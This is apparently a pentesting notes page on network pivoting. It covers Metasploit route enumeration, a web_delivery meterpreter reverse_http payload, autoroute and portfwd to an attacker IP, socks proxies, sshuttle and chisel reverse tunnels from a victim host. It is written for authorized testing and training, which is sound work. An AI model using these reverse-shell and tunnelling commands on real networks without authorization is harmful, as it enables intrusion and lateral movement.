CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • Metasploit
  • Check routes on a win machine
  • Reverse port forwarding and Session Passing with Metasploit having initial shell on Covenant
  • Shuttle
  • Chisel
  • Pivoting with Chisel
  • Resources
  1. Post Exploitation

Pivoting

Metasploit

Check routes on a win machine

  • We need to see what other access has our target machine

  • route print

    C:\Windows\system32>route print
    route print
    ===========================================================================
    Interface List
     12...08 00 27 ae c1 68 ......Intel(R) PRO/1000 MT Desktop Adapter
      1...........................Software Loopback Interface 1
    ===========================================================================
    
    IPv4 Route Table
    ===========================================================================
    Active Routes:
    Network Destination        Netmask          Gateway       Interface  Metric
              0.0.0.0          0.0.0.0     192.168.57.1        10.0.2.15     25
             10.0.2.0    255.255.255.0         On-link         10.0.2.15    281
            10.0.2.15  255.255.255.255         On-link         10.0.2.15    281
           10.0.2.255  255.255.255.255         On-link         10.0.2.15    281
            127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
            127.0.0.1  255.255.255.255         On-link         127.0.0.1    331
      127.255.255.255  255.255.255.255         On-link         127.0.0.1    331
            224.0.0.0        240.0.0.0         On-link         127.0.0.1    331
            224.0.0.0        240.0.0.0         On-link         10.0.2.15    281
      255.255.255.255  255.255.255.255         On-link         127.0.0.1    331
      255.255.255.255  255.255.255.255         On-link         10.0.2.15    281
    ===========================================================================
    Persistent Routes:
      None
    
    IPv6 Route Table
    ===========================================================================
    Active Routes:
     If Metric Network Destination      Gateway
      1    331 ::1/128                  On-link
     12    281 fe80::/64                On-link
     12    281 fe80::857:534f:3bb0:8fce/128
                                        On-link
      1    331 ff00::/8                 On-link
     12    281 ff00::/8                 On-link
    ===========================================================================
    Persistent Routes:
      None
  • arp -a

    Interface: 10.0.2.15 --- 0xc
    Internet Address      Physical Address      Type
    10.0.2.3              08-00-27-35-94-d3     dynamic   
    10.0.2.4              08-00-27-fc-72-e9     dynamic   
    10.0.2.5              08-00-27-7f-90-90     dynamic   
    10.0.2.8              08-00-27-1d-d2-98     dynamic   
    10.0.2.255            ff-ff-ff-ff-ff-ff     static    
    192.168.57.1          52-54-00-12-35-00     dynamic   
    224.0.0.22            01-00-5e-00-00-16     static    
    224.0.0.251           01-00-5e-00-00-fb     static    
    224.0.0.252           01-00-5e-00-00-fc     static    
    239.255.255.250       01-00-5e-7f-ff-fa     static    
    255.255.255.255       ff-ff-ff-ff-ff-ff     static    
  • Now that we have other interesting IPs we can try to reach those new ones

  • We can make a port scan on one of these IPs

  • use auxiliary/scanner/portscan/tcp

  • set rhosts 10.0.2.5

  • set ports 445

  • run

    [+] 10.0.2.5:             - 10.0.2.5:445 - TCP OPEN
    [*] 10.0.2.5:             - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    We could of course have set more ports and this would be a cool nmap like tool.

Reverse port forwarding and Session Passing with Metasploit having initial shell on Covenant

  • We can assume that we have a shell with covenant for instance

  • We generate a payload with metasploit through web delivery (more stealthy because it can pass as http traffic)

  • use exploit/multi/script/web_delivery

  • set target 2 (for powershell)

  • set payload windows/x64/meterpreter/reverse_http

  • set lhost to your attacking machine

  • sel an lport

  • exploit -j

  • Now we can copy the payload and paste to our grunt in Covenant

  • Metasploit should now have opened a session

  • We can choose an interface with ipconfig

  • run autoroute -s 192.168.16.0/24

  • We can check it's been done using run autoroute -p

  • We can now set up a reverse port forward

  • portfwd add -R -p 1234 -l 443 -L ATTACKING-MACHINE-IP

  • We can check it's been done using portfwd

  • we can background our session with CTRL-Z

  • We will setup a socks proxy use auxiliary/server/socks4a

  • We need to check our port in /etc/proxychains4.conf

  • set srvport 9050

  • we can check our jobs using jobs

  • We can kill the web delivery one that we do not need anymore jobs -k ID-OF-JOB

  • We now need to create a listener on covenant that will interact with the port forward set previously: 1 192.168.3.28:443 0.0.0.0:1234 Reverse

  • BindAddress can stay at 0.0.0.0, BindPort should be 443, connectPort should be 1234 and connect address is the ip of our victime machine.

  • We should now be able to reach other machine in the network of the initial machine that has now route to our attacking machine using proxychains

Shuttle

Let's say you got shell on a machine and this machine has access local to another (let's call it machine 2). Shuttle will allow you to access machine 2 from your network and act as a proxy.

sshuttle --listen 0.0.0.0 -e "ssh -i keyfile" -r user@IP-OF-YOUR-TARGET-MACHINE IP-OF-SUBNET-ACCESSIBLE-THROUGH-MACHINE2/24 -v
// example
sshuttle --listen 0.0.0.0 -e "ssh -i key" -r root@10.10.120.117 172.12.1.0/24 -v

Chisel

  • If you have a shell on a machine that has a local port open you can forward this port to your machine using chisel, it is called port forwarding for instance in our example we want to forward to listen the port 445 of the target machine that is open locally. You will then be able to intract from your kali on your port 445:

- On my kali `chisel server --reverse` (it is going to listen on port 8080)
- On the target `.\chisel.exe client KALI-IP:8080 R:445:127.0.0.1:445`

Pivoting with Chisel

  • From my kali chisel server --reverse

  • From the victim machine .\chisel.exe client IP-OF-KALI:8080 R:1080:socks

  • In your etc/proxychains4.conf add this line socks5 127.0.0.1 1080

Resources

PreviousMaintaining AccessNextCleaning up

Last updated 2 years ago

You can check out examples of use of chisel on the or

chatterbox writeup
buffer overflow windows
Etat de l’art du pivoting réseau en 2019 | Orange CyberdefenseFrance
Amazing Resource about pivoting but only in french, it could def be read using google translate
Practical Ethical Hacking - The Complete Course
TCM Security Academy - Practical Ethical Hacking - The Complete Course
Logo
Logo